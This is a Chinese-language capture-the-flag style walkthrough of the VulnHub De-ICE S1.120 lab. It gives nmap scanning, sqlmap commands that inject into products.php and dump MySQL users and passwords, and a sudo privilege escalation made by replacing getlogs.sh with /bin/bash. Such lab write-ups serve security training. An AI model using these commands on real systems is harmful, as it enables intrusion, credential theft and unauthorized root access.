De-ICE_S1.120超详细靶场实战

一、下载地址

https://www.vulnhub.com/entry/de-ice-s1120,10/

二、将kali与靶机的网卡设置为仅主机

靶机

kali

三、主机探测与端口扫描

nmap 192.168.1.0/24

发现靶机开启了21、22、80、443、3306端口

四、访问80端口

1.点击添加产品，来到如下页面

2.添加产品并提交

3.点击view proucts，来到如下页面

选择产品1，点击提交

发现url地址出现新的参数

第一反应进行sql注入测试

└─$ sqlmap -u "http://192.168.1.120/products.php?id=1*" --batch --random-agent

 

 发现存在sql注入

4.获取数据库名

sqlmap -u "http://192.168.1.120/products.php?id=1*" --batch --random-agent --dbs

5.获取账户信息

sqlmap -u "http://192.168.1.120/products.php?id=1*" --batch --random-agent -D mysql --users --password

 

发现有很多用户，我们挨个登录，发现ccoffee用户可以提权

五、ssh远程登录ccoffee用户

我们这里使用finalshell连接

 1.枚举具有 SUID 权限的所有二进制文件

find / -perm -u=s -type f 2>/dev/null

 

 2.发现有一个/home/ccoffee/scripts/getlogs.sh命令

我们切换到/home/ccoffee/scripts目录下

cd /home/ccoffee/scripts

 输入如下命令

mv getlogs.sh getlogs.sh.bak         #将原本的sh文件备份
echo "/bin/bash" >  getlogs.sh       #新建一个sh文件输入/bin/sh
chmod 777 getlogs.sh                 #赋予权限

 

 使用sudo 运行getlogs.sh文件

sudo ./getlogs.sh 

 提权成功！